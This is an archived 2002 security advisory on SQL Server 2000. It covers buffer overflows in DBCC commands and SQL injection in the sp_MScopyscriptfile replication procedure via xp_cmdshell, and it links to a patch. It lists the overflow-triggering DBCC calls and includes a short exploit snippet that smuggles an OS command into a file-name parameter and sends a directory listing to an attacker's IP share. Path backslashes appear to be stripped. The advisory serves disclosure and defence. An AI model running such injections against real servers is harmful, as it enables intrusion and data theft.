COMMAND

	SQL Server 2000 Buffer Overflows and SQL Inyection vulnerabilities

SYSTEMS AFFECTED

	Sql Server 2000 all Service Packs

PROBLEM

	In Cesar Cerrudot  advisory  with  the  collaboration  of  Aaron  Newman
	(Application                       Security,                       Inc.)
	[http://www.appsecinc.com/resources/alerts/mssql/02-0011.html] :
	

	Database Consistency Checkers  (DBCCs)  are  command  console  utilities
	that allow maintenance and other operations to be  performed  on  a  SQL
	Server, some of the DBCC functions are vulnerable to  buffer  overflows.
	The explotation of these vulnerabilities could  enable  an  attacker  to
	run code  in  the  context  of  the  SQL  Server  service.  Some  stored
	procedures  used  in  database  replication  are   vulnerable   to   SQL
	injection. The explotation of  these  vulnerabilities  could  enable  an
	attacker to run OS commands with xp_cmdshell in the context of  the  SQL
	Server Agent Proxy account.
	

	 Details

	 =======

	

	The following DBCC funcions contain unchecked buffers:

	DBCC ADDEXTENDEDPROC ('xp_storedproc','XXX...') (a)

	DBCC INDEXFRAG ('','XXX...') (b) 

	DBCC UPDATEUSAGE ('','XXX...') (c) 

	DBCC CHECKCONSTRAINTS ('XXX...') (c) 

	DBCC SHOWCONTIG ('XXX...') (d) 

	DBCC CLEANTABLE ('','XXX...') (d)

	

	(a) Only members of sysadmin fixed server role can run this command.
	

	(b) Only members of sysadmin fixed server role, db_owner or  db_ddladmin
	fixed database role can run this command.
	

	(c) Only members  of  sysadmin  fixed  server  role  or  db_owner  fixed
	database role can run this command.
	

	(d) All users  can  run  this  command.  The  buffer  overflow  in  DBCC
	ADDEXTENDEDPROC affects SQL Server 7.0 too.
	

	Sp_MScopyscriptfile  stored  procedure  is   one   of   several   stored
	procedures (not mentioned here for  time  reasons)  vulnerables  to  SQL
	Inyection. Sp_MScopyscriptfile create a  directory  in  the  SQL  Server
	replication directory and then copy a script file into it.  It  has  one
	input parameter @scriptfile that is the name of the script  file  to  be
	copied. In that parameter OS commands can be inyected and then  executed
	by xp_cmdshell.
	

	---Code snip of sp_MScopyscriptfile stored procedure

	where the inyection ocurrs---

	

	select @cmd = N'copy "' + @scriptfile + N'" "' +

	@directory + N'"'

	exec @retcode = master..xp_cmdshell @cmd, NO_OUTPUT

	

	----End code snip-----

	

	SQL Server Agent Proxy account must be  enabled  to  succesfull  exploit
	these SQL Inyection vulnerabilities and is not enabled by default.
	

	 Exploit

	 =======

	

	declare @command varchar(100)

	declare @scripfile varchar(200)

	set concat_null_yields_null off

	select @command='dir c: >

	"attackeripsharedir.txt"'

	select @scripfile='c:autoexec.bat > nul" | ' +

	@command + ' | rd "' 

	exec sp_MScopyscriptfile @scripfile ,''

	

	

	 Update (22 August 2002)

	 ======

	

	Mark Litchfield of NGS Software Ltd  [http://www.ngssoftware.com/]  adds
	:
	

	

	There also exists another two bufferoverruns :
	

	1) DBCC buffer(master, long string)

	2) DBCC DBCC procbuf(master,'longstring',1,0)

	

	

	 Update (03 September 2002)

	 ======

	

	Sample exploit code made available in NGSS research paper :
	

	http://www.nextgenss.com/papers/tp-SQL2000.pdf

	

	

SOLUTION

	 Patch

	 ===== 

	

	http://www.microsoft.com/technet/security/bulletin/MS02-038.asp

	

	

	 -And-

	

	

	http://download.microsoft.com/download/SQLSVR2000/Patch/8.00.0667/W98NT42KMeXP/EN-US/8.00.0667_enu.exe